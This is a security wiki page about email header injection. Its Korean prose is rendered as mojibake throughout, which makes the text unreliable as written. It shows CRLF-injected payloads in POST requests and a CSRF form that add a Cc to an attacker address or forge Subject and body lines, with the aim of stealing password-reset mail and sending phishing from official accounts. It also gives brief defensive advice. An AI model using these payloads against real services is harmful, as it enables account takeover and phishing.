Email Injection

Email Injection

in

๐Ÿ” Introduction

Email Injection์€ Application์—์„œ ์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ ๋ฐ›์€ ์ž…๋ ฅ ๊ฐ’์ด Email์„ ์ฒ˜๋ฆฌํ•˜๋Š”๋ฐ ์‚ฌ์šฉ๋˜๊ณ  ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ๋ฏธํกํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ ์•…์˜์ ์ธ ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ๋ฉ”์ผ ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

{
    "email":"sender@domain.com%0ACc:attacker@domain.com"
}

๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•œ๋‹ค๋ฉด ๊ณต์‹ ๊ณ„์ • ์‚ฌ์นญ์ด๋‚˜ ํ”ผ์‹ฑ ๋“ฑ์— ํ™œ์šฉ๋  ์ˆ˜ ์žˆ๊ณ , ์—ฐ๊ด€๋œ ์‹œ์Šคํ…œ์— ๋”ฐ๋ผ์„œ ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์— ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

์ดˆ๋Œ€, ์•ˆ๋‚ด ๋“ฑ ์›น ์š”์ฒญ ์ดํ›„์— ์ด๋ฉ”์ผ์ด ์ „์†ก๋˜๋Š” ๋ชจ๋“  ๊ตฌ๊ฐ„์€ Email Injection์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=hahwul@gmail.com

email ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ†ตํ•ด ๋ฐ›์€ ๊ฐ’์ด SMTP ๋“ฑ ๋ฉ”์ผ ์ „์†ก ์‹œ์Šคํ…œ์„ ํ†ตํ•ด ์ „์†ก๋  ๋•Œ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ์—†๋‹ค๋ฉด CRLF(๊ฐœํ–‰๋ฌธ์ž)๋“ฑ์„ ์ด์šฉํ•˜์—ฌ Email์˜ ์†ก/์ˆ˜์‹ ์ธ, ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=hahwul@gmail.com%0ASubject:Fake%20Subject

Exploitation

Stealing sensitive inforamation

CSRF ๋“ฑ์˜ ์ทจ์•ฝ์ ๊ณผ ์กฐํ•ฉ๋˜๋ฉด ํŒจ์Šค์›Œ๋“œ ์žฌ ์„ค์ • ์‹œ ๋ฐœ์ƒํ•˜๋Š” ๋ฉ”์ผ์ด๋‚˜ 2FA ์ธ์ฆ ๊ฐ’ ๋“ฑ ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=victim@domain.com%0ACc:attacker@domain.com

๋ฉ”์ผ์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ์š”์ฒญ ์‹œ Email Injectionํ•˜์—ฌ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ์—๋„ Cc๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ์ „๋‹ฌ๋  ์ˆ˜ ์žˆ๋„๋ก ๊ณต๊ฒฉ์ฝ”๋“œ๋ฅผ ๊ตฌ์„ฑํ•œ๋‹ค๋ฉด ํ”ผํ•ด์ž๊ฐ€ CSRF ์ฝ”๋“œ ์ ‘๊ทผ ์‹œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์žฌ์ƒ์„ฑ ๋งํฌ ๋“ฑ์„ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ๋กœ๋„ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ์–ด ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์˜ ์ด์Šˆ์™€ ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<form arciton="https://weakness-service/findPassword" method="post">
    <input type=text name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>

Subject, Body๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ํ”ผ์‹ฑ ๋ฉ”์ผ ๊ตฌ์„ฑ

Email Injection์ด ๊ฐ€๋Šฅํ•œ ๋ฉ”์ผ์ด noreply@blahblah ๋“ฑ ๊ณต์‹ ๊ณ„์ •์œผ๋กœ ์ „์†ก๋˜๋Š” ๊ฒฝ์šฐ Subject, Body ๋“ฑ์„ ์กฐ์ž‘ํ•˜์—ฌ ๊ณต์‹ ๊ณ„์ •์—์„œ์˜ ํ”ผ์‹ฑ ๋ฉ”์ผ์„ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /notify HTTP/1.1

email=victim@domain.com%0ASubjack:Important%20Security%20Alerts%0A%0AFake%20Message!

RCE

Mail ์ „์†ก์„ ์œ„ํ•ด์„œ Command-line์œผ๋กœ ๋‹ค๋ฅธ Mail Application์„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๋Œ€ํ‘œ์ ์œผ๋กœ PHP Cli์˜ mail() ํ•จ์ˆ˜๋„ ๋น„์Šทํ•˜์ฃ .

์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ Command Injection๊ณผ ๋™์ผํ•˜๊ฒŒ ํ•ด๋‹น ๊ณผ์ •์—์„œ ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•œ ์ฒ˜๋ฆฌ๊ฐ€ ๋ฏธํกํ•˜๋‹ค๋ฉด ์ด๋ฅผ ํ†ตํ•ด ์ตœ์ข…์ ์œผ๋กœ RCE๊นŒ์ง€ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ›ก Defensive techniques

์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ Email ์ „์†ก์— ์‚ฌ์šฉ๋˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐ›์•„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์ง€์ •๋œ ํฌ๋งท์˜ ๋ฐ์ดํ„ฐ ์ด์™ธ์—๋Š” ์ฒ˜๋ฆฌํ•˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. ํŠนํžˆ ๊ฐœํ–‰๋ฌธ์ž์˜ ๊ฒฝ์šฐ ์—ฌ๋Ÿฌ๊ฐ€์ง€ Exploit ํฌ์ธํŠธ๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ผญ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

๐Ÿ“Œ References

  • https://en.wikipedia.org/wiki/Email_injection
  • https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
  • https://www.hahwul.com/cullinan/crlf-injection/#-defensive-techniques